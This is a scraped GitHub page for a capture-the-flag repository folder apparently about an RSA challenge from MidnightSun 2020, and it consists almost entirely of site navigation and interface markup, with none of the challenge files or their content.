<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="239170367" data-scoped-search-url="/ironore15/ctf/search" data-owner-scoped-search-url="/users/ironore15/search" data-unscoped-search-url="/search" data-turbo="false" action="/ironore15/ctf/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="M3WZfnb8IQLftb/bezvOxjUUENTQjyG5Q5R6tj/qa5yuGNbEI0Pdgwt+z1tmEO7ySX0iVP65Y8cmhuW76k3/Uw==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> ironore15 </span> <span>/</span> ctf
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>14</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-pull-request UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 3.25a2.25 2.25 0 1 1 3 2.122v5.256a2.251 2.251 0 1 1-1.5 0V5.372A2.25 2.25 0 0 1 1.5 3.25Zm5.677-.177L9.573.677A.25.25 0 0 1 10 .854V2.5h1A2.5 2.5 0 0 1 13.5 5v5.628a2.251 2.251 0 1 1-1.5 0V5a1 1 0 0 0-1-1h-1v1.646a.25.25 0 0 1-.427.177L7.177 3.427a.25.25 0 0 1 0-.354ZM3.75 2.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm0 9.5a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Zm8.25.75a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Z"></path></svg> <span>Pull requests</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-play UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Zm4.879-2.773 4.264 2.559a.25.25 0 0 1 0 .428l-4.264 2.559A.25.25 0 0 1 6 10.559V5.442a.25.25 0 0 1 .379-.215Z"></path></svg> <span>Actions</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-table UnderlineNav-octicon d-none d-sm-inline"> <path d="M0 1.75C0 .784.784 0 1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25ZM6.5 6.5v8h7.75a.25.25 0 0 0 .25-.25V6.5Zm8-1.5V1.75a.25.25 0 0 0-.25-.25H6.5V5Zm-13 1.5v7.75c0 .138.112.25.25.25H5v-8ZM5 5V1.5H1.75a.25.25 0 0 0-.25.25V5Z"></path></svg> <span>Projects</span> <span>0</span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-shield UnderlineNav-octicon d-none d-sm-inline"> <path d="M7.467.133a1.748 1.748 0 0 1 1.066 0l5.25 1.68A1.75 1.75 0 0 1 15 3.48V7c0 1.566-.32 3.182-1.303 4.682-.983 1.498-2.585 2.813-5.032 3.855a1.697 1.697 0 0 1-1.33 0c-2.447-1.042-4.049-2.357-5.032-3.855C1.32 10.182 1 8.566 1 7V3.48a1.75 1.75 0 0 1 1.217-1.667Zm.61 1.429a.25.25 0 0 0-.153 0l-5.25 1.68a.25.25 0 0 0-.174.238V7c0 1.358.275 2.666 1.057 3.86.784 1.194 2.121 2.34 4.366 3.297a.196.196 0 0 0 .154 0c2.245-.956 3.582-2.104 4.366-3.298C13.225 9.666 13.5 8.36 13.5 7V3.48a.251.251 0 0 0-.174-.237l-5.25-1.68ZM8.75 4.75v3a.75.75 0 0 1-1.5 0v-3a.75.75 0 0 1 1.5 0ZM9 10.5a1 1 0 1 1-2 0 1 1 0 0 1 2 0Z"></path></svg> <span>Security</span> <include-fragment src="/ironore15/ctf/security/overall-count" accept="text/fragment+html"></include-fragment>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-graph UnderlineNav-octicon d-none d-sm-inline"> <path d="M1.5 1.75V13.5h13.75a.75.75 0 0 1 0 1.5H.75a.75.75 0 0 1-.75-.75V1.75a.75.75 0 0 1 1.5 0Zm14.28 2.53-5.25 5.25a.75.75 0 0 1-1.06 0L7 7.06 4.28 9.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.25-3.25a.75.75 0 0 1 1.06 0L10 7.94l4.72-4.72a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042Z"></path></svg> <span>Insights</span> <span></span>
<div style="visibility:hidden;" data-view-component="true" class="UnderlineNav-actions js-responsive-underlinenav-overflow position-absolute pr-3 pr-md-4 pr-lg-5 right-0"> <details data-view-component="true" class="details-overlay details-reset position-relative"> <summary role="button" data-view-component="true"> <div class="UnderlineNav-item mr-0 border-0"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-kebab-horizontal"> <path d="M8 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3ZM1.5 9a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Zm13 0a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path></svg> <span>More</span> </div></summary> <details-menu role="menu" data-view-component="true" class="dropdown-menu dropdown-menu-sw"> Code Issues Pull requests Actions Projects Security Insights </details-menu></details></div></nav>
</div>
<turbo-frame id="repo-content-turbo-frame" target="_top" data-turbo-action="advance" class=""> <div id="repo-content-pjax-container" class="repository-content " >
<div class="clearfix container-xl px-3 px-md-4 px-lg-5 mt-4"> <div >
<div class="file-navigation mb-3 d-flex flex-items-start"> <div class="position-relative"> <details class="js-branch-select-menu details-reset details-overlay mr-0 mb-0 " id="branch-select-menu" data-hydro-click-payload="{"event_type":"repository.click","payload":{"target":"REFS_SELECTOR_MENU","repository_id":239170367,"originating_url":"https://github.com/ironore15/ctf/tree/master/2020-MidnightSun/rsa_yay","user_id":null}}" data-hydro-click-hmac="7b4eca04484d884f1bbea448d7f38ae767751fbaa5ddbeb7dcdc6c00a65e3fb7"> <summary class="btn css-truncate" data-hotkey="w" title="Switch branches or tags"> <svg text="gray" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-git-branch"> <path d="M9.5 3.25a2.25 2.25 0 1 1 3 2.122V6A2.5 2.5 0 0 1 10 8.5H6a1 1 0 0 0-1 1v1.128a2.251 2.251 0 1 1-1.5 0V5.372a2.25 2.25 0 1 1 1.5 0v1.836A2.493 2.493 0 0 1 6 7h4a1 1 0 0 0 1-1v-.628A2.25 2.25 0 0 1 9.5 3.25Zm-6 0a.75.75 0 1 0 1.5 0 .75.75 0 0 0-1.5 0Zm8.25-.75a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5ZM4.25 12a.75.75 0 1 0 0 1.5.75.75 0 0 0 0-1.5Z"></path></svg> <span>master</span> <span></span> </summary>
<div class="SelectMenu"> <div class="SelectMenu-modal"> <header class="SelectMenu-header"> <span>Switch branches/tags</span> <button class="SelectMenu-closeButton" type="button" data-toggle-for="branch-select-menu"><svg aria-label="Close menu" aria-hidden="false" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg></button> </header>
<input-demux data-action="tab-container-change:input-demux#storeInput tab-container-changed:input-demux#updateInput"> <tab-container class="d-flex flex-column js-branches-tags-tabs" style="min-height: 0;"> <div class="SelectMenu-filter"> <input data-target="input-demux.source" id="context-commitish-filter-field" class="SelectMenu-input form-control" aria-owns="ref-list-branches" data-controls-ref-menu-id="ref-list-branches" autofocus autocomplete="off" aria-label="Filter branches/tags" placeholder="Filter branches/tags" type="text" > </div>
<div class="SelectMenu-tabs" role="tablist" data-target="input-demux.control" > <button class="SelectMenu-tab" type="button" role="tab" aria-selected="true">Branches</button> <button class="SelectMenu-tab" type="button" role="tab">Tags</button> </div>
